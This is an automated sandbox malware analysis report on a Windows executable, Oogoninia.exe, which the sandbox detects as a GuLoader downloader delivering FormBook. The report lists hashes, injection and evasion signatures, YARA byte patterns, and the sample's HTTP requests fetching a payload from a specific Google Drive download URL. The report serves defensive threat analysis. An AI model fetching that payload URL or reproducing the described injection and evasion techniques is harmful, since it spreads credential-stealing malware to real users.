Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Oogoninia.exe

Overview

General Information

Sample name:Oogoninia.exe
Analysis ID:1529338
MD5:18fb2cccaa9ac71624eaceada006e938
SHA1:a25055a3b29ce0ee64d7e20eccced0f72ec737db
SHA256:9b00715d77438200a4f54fa8f47ac17aab0cc166e95fc6737c2a78021b69a64e
Infos:

Detection

FormBook, GuLoader
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • Oogoninia.exe (PID: 3472 cmdline: "C:\Users\user\Desktop\Oogoninia.exe" MD5: 18FB2CCCAA9AC71624EACEADA006E938)
    • Oogoninia.exe (PID: 9000 cmdline: "C:\Users\user\Desktop\Oogoninia.exe" MD5: 18FB2CCCAA9AC71624EACEADA006E938)
      • RAVCpl64.exe (PID: 6496 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
        • grpconv.exe (PID: 7408 cmdline: "C:\Windows\SysWOW64\grpconv.exe" MD5: 5A13926732E6D349FD060C072BC7FB74)
          • explorer.exe (PID: 4908 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.2899878533.0000000004A20000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000009.00000002.2899878533.0000000004A20000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2c040:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1415f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000002.00000002.1365396637.00000000321D0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.1365396637.00000000321D0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2c040:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1415f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000009.00000002.2899793805.00000000049D0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 2 entries

        Sigma Signatures

        No Sigma rule has matched

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-08T21:52:07.420667+020028032702Potentially Bad Traffic192.168.11.2049705142.250.80.78443TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for submitted file
        Source: Oogoninia.exeReversingLabs: Detection: 39%
        Yara detected FormBook
        Source: Yara matchFile source: 00000009.00000002.2899878533.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.1365396637.00000000321D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.2899793805.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Machine Learning detection for sample
        Source: Oogoninia.exeJoe Sandbox ML: detected
        Source: Oogoninia.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 142.250.80.78:443 -> 192.168.11.20:49705 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.251.40.129:443 -> 192.168.11.20:49706 version: TLS 1.2
        Source: Oogoninia.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: grpconv.pdb source: Oogoninia.exe, 00000002.00000002.1354974337.0000000002246000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: grpconv.pdbGCTL source: Oogoninia.exe, 00000002.00000002.1354974337.0000000002246000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: Oogoninia.exe, 00000002.00000001.1095360708.0000000000649000.00000020.00000001.01000000.00000006.sdmp
        Source: Binary string: wntdll.pdbUGP source: Oogoninia.exe, 00000002.00000003.1266200701.0000000032185000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1269709171.000000003233F000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp, grpconv.exe, 00000009.00000002.2900077757.0000000004D5D000.00000040.00001000.00020000.00000000.sdmp, grpconv.exe, 00000009.00000003.1352249094.00000000048C5000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000009.00000003.1355628174.0000000004A7E000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000009.00000002.2900077757.0000000004C30000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: Oogoninia.exe, Oogoninia.exe, 00000002.00000003.1266200701.0000000032185000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1269709171.000000003233F000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp, grpconv.exe, grpconv.exe, 00000009.00000002.2900077757.0000000004D5D000.00000040.00001000.00020000.00000000.sdmp, grpconv.exe, 00000009.00000003.1352249094.00000000048C5000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000009.00000003.1355628174.0000000004A7E000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000009.00000002.2900077757.0000000004C30000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: Oogoninia.exe, 00000002.00000001.1095360708.0000000000649000.00000020.00000001.01000000.00000006.sdmp
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 0_2_00405642 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405642
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 0_2_004060A4 FindFirstFileA,FindClose,0_2_004060A4
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 0_2_0040270B FindFirstFileA,0_2_0040270B
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4x nop then mov ebx, 00000004h4_2_04117D06
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 4x nop then mov ebx, 00000004h9_2_04B204E1
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49705 -> 142.250.80.78:443
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ebPjn97g6Md1czlcx8nGPFrA4sVz_tMd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /download?id=1ebPjn97g6Md1czlcx8nGPFrA4sVz_tMd&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ebPjn97g6Md1czlcx8nGPFrA4sVz_tMd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /download?id=1ebPjn97g6Md1czlcx8nGPFrA4sVz_tMd&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: drive.google.com
        Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
        Source: explorer.exe, 0000000F.00000000.2836002415.000000000E073000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.5994248157.000000000E073000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2830216566.0000000009FCF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.5986237494.0000000009FCF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
        Source: Oogoninia.exe, 00000002.00000003.1190652532.00000000021FE000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1266904582.00000000021FE000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1190121446.00000000021FC000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000002.1354638492.0000000002200000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1266629669.00000000021FC000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1156475256.0000000002200000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1156646275.0000000002200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: Oogoninia.exe, 00000002.00000003.1190652532.00000000021FE000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1266904582.00000000021FE000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1190121446.00000000021FC000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000002.1354638492.0000000002200000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1266629669.00000000021FC000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1156475256.0000000002200000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1156646275.0000000002200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: explorer.exe, 0000000F.00000000.2836002415.000000000E073000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.5994248157.000000000E073000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2830216566.0000000009FCF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.5986237494.0000000009FCF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
        Source: Oogoninia.exe, 00000002.00000001.1095360708.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
        Source: Oogoninia.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
        Source: Oogoninia.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: explorer.exe, 0000000F.00000000.2836002415.000000000E073000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.5994248157.000000000E073000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2830216566.0000000009FCF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.5986237494.0000000009FCF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: explorer.exe, 0000000F.00000000.2830216566.0000000009F57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.5986237494.0000000009F57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crl
        Source: explorer.exe, 0000000F.00000002.5987815503.000000000A410000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.2825779872.00000000017A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.2831622571.000000000AE70000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
        Source: Oogoninia.exe, 00000002.00000001.1095360708.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
        Source: Oogoninia.exe, 00000002.00000001.1095360708.0000000000626000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
        Source: Oogoninia.exe, 00000002.00000003.1190652532.00000000021FE000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1266904582.00000000021FE000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1190121446.00000000021FC000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000002.1354638492.0000000002200000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1266629669.00000000021FC000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1156475256.0000000002200000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1156646275.0000000002200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
        Source: Oogoninia.exe, 00000002.00000001.1095360708.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
        Source: Oogoninia.exe, 00000002.00000001.1095360708.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
        Source: explorer.exe, 0000000F.00000002.5985932285.0000000009DC1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2830063439.0000000009E31000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirm
        Source: explorer.exe, 0000000F.00000000.2833665275.000000000DAFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.5991554898.000000000DAFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/B
        Source: explorer.exe, 0000000F.00000000.2833665275.000000000DAFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.5991554898.000000000DAFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/J
        Source: explorer.exe, 0000000F.00000000.2829964726.0000000009DC1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
        Source: explorer.exe, 0000000F.00000000.2833665275.000000000DAFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.5991554898.000000000DAFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=DC09251A71C5472DA2BDFD73DC109609&timeOut=5000&oc
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2833665275.000000000DAFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.5991554898.000000000DAFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
        Source: Oogoninia.exe, 00000002.00000003.1156475256.0000000002200000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1156646275.0000000002200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
        Source: explorer.exe, 0000000F.00000002.5985932285.0000000009DC1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829964726.0000000009DC1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comO
        Source: explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Stock_In
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/taskbar/icons/earnings/svg/light/blue.svg
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition/MostlyCloudyNight.pn
        Source: explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition/MostlyCloudyNight.sv
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Teaser/humidity.png
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Teaser/humidity.svg
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/20240402.1/Weather/W36_Most
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/20240402.1/WeatherInsight/W
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C3A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C3A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.m
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fgwm
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fgwm-dark
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gowI
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gowI-dark
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gyvW
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gyvW-dark
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13pwi3
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13pwi3-dark
        Source: Oogoninia.exe, 00000002.00000002.1354263850.0000000002178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
        Source: Oogoninia.exe, 00000002.00000002.1354263850.0000000002178000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000002.1364783984.00000000318B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ebPjn97g6Md1czlcx8nGPFrA4sVz_tMd
        Source: Oogoninia.exe, 00000002.00000002.1354263850.0000000002178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ebPjn97g6Md1czlcx8nGPFrA4sVz_tMdBSX
        Source: Oogoninia.exe, 00000002.00000002.1354263850.0000000002178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ebPjn97g6Md1czlcx8nGPFrA4sVz_tMdXSN
        Source: Oogoninia.exe, 00000002.00000002.1354263850.0000000002178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ebPjn97g6Md1czlcx8nGPFrA4sVz_tMds2
        Source: Oogoninia.exe, 00000002.00000003.1190652532.00000000021FE000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1266904582.00000000021FE000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1190121446.00000000021FC000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000002.1354638492.0000000002200000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1266629669.00000000021FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
        Source: Oogoninia.exe, 00000002.00000003.1190652532.00000000021FE000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1266904582.00000000021FE000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1190121446.00000000021FC000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000002.1354638492.0000000002200000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1266629669.00000000021FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/OlG
        Source: Oogoninia.exe, 00000002.00000003.1190652532.00000000021FE000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1266904582.00000000021FE000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1190121446.00000000021FC000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000002.1354638492.0000000002200000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1266629669.00000000021FC000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1156475256.0000000002200000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1156646275.0000000002200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1ebPjn97g6Md1czlcx8nGPFrA4sVz_tMd&export=download
        Source: Oogoninia.exe, 00000002.00000003.1266977009.00000000021D6000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000002.1354263850.00000000021D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1ebPjn97g6Md1czlcx8nGPFrA4sVz_tMd&export=download88
        Source: Oogoninia.exe, 00000002.00000002.1354263850.00000000021CD000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1266977009.00000000021CC000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1267464453.00000000021CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1ebPjn97g6Md1czlcx8nGPFrA4sVz_tMd&export=download;8
        Source: Oogoninia.exe, 00000002.00000003.1190652532.00000000021FE000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1266904582.00000000021FE000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1190121446.00000000021FC000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000002.1354638492.0000000002200000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1266629669.00000000021FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1ebPjn97g6Md1czlcx8nGPFrA4sVz_tMd&export=downloade
        Source: explorer.exe, 0000000F.00000000.2833665275.000000000DAFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.5991554898.000000000DAFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA179X84.img
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1g7bhz.img
